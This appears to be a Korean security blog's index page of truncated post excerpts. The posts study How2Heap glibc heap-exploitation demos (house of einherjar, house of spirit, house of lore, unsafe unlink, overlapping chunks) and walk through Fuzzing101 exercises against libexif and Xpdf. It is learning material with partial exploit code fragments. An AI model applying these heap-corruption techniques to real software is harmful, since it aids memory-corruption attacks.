분류 전체보기 (17) 썸네일형 리스트형 [How2Heap] - house_of_einherjar.c Exploiting a single null byte overflow to trick malloc into returning a controlled pointerTested on Ubuntu 20.10 64bit (glibc-2.32). 라고 되어있다. demonstrates the house of einherjar attack by creating a chunk overlapping situation생성 청크 오버래핑 으로 houser of einherjar attack을 할 것이라고 한다.#include #include #include #include #include int main(){ /* * This modification to The House of Enherjar works with the.. [How2Heap] - mmap_overlapping_chunks.c #include #include #include #include /*Technique should work on all versions of GLibCCompile: `gcc mmap_overlapping_chunks.c -o mmap_overlapping_chunks -g`POC written by POC written by Maxwell Dulin (Strikeout)*/int main(){ /* A primer on Mmap chunks in GLibC ================================== In GLibC, there is a point where an allocation is so large that malloc .. [How2Heap] - overlapping_chunks.c /* A simple tale of overlapping chunk. This technique is taken from http://www.contextis.com/documents/120/Glibc_Adventures-The_Forgotten_Chunks.pdf*/#include #include #include #include #include int main(int argc , char* argv[]){ setbuf(stdout, NULL); long *p1,*p2,*p3,*p4; printf("\nThis is another simple chunks overlapping problem\n"); printf("The previous technique is killed by patch: https://.. [How2Heap] - house_of_lore.c Tricking malloc into returning a nearly-arbitrary pointer by abusing the smallbin freelist. /*Advanced exploitation of the House of Lore - Malloc Maleficarum.This PoC take care also of the glibc hardening of smallbin corruption.[ ... ]else { bck = victim->bk; if (__glibc_unlikely (bck->fd != victim)){ errstr = "malloc(): smallbin double linked list corrupted"; .. [How2Heap] - house_of_spirit.c Frees a fake fastbin chunk to get malloc to return a nearly-arbitrary pointer.#include #include int main(){ fprintf(stderr, "This file demonstrates the house of spirit attack.\n"); fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n"); malloc(1); fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n"); unsigned long long *a; // This has nothi.. [Fuzzing101] Exercise 2 https://github.com/antonio-morales/Fuzzing101/tree/main/Exercise%202 Fuzzing101/Exercise 2 at main · antonio-morales/Fuzzing101An step by step fuzzing tutorial. A GitHub Security Lab initiative - antonio-morales/Fuzzing101github.comlibexif를 타겟으로 한다. 우선 libexif-0.6.14를 다운한다.wget https://github.com/libexif/libexif/archive/refs/tags/libexif-0_6_14-release.tar.gztar -xzvf libexif-0_6_14-release.tar... [Fuzzing101] - Exercise 1 Fuzzing101에서 Exercise1을 할 것이다. Xpdf가 타겟이라 되어있다.All the exercises have been tested on Ubuntu 20.04.2 LTS. You can download it from here Thank you for downloading Ubuntu Desktop | UbuntuUbuntu is an open source software operating system that runs from the desktop, to the cloud, to all your internet connected things.ubuntu.com이렇게 Ubuntu 20.04.2 LTS를 다운하라고 한다. 다운하고 패키지를 다운한다.sudo apt update -y && su.. 06. [How2Heap] - unsafe_unlink.c #include #include #include #include #include uint64_t *chunk0_ptr;int main(){ setbuf(stdout, NULL); printf("Welcome to unsafe unlink 2.0!\n"); printf("Tested in Ubuntu 20.04 64bit.\n"); printf("This technique can be used when you have a pointer at a known location to a region you can call unlink on.\n"); printf("The most common scenario is a vulnerable buffer t.. 이전 1 2 3 다음
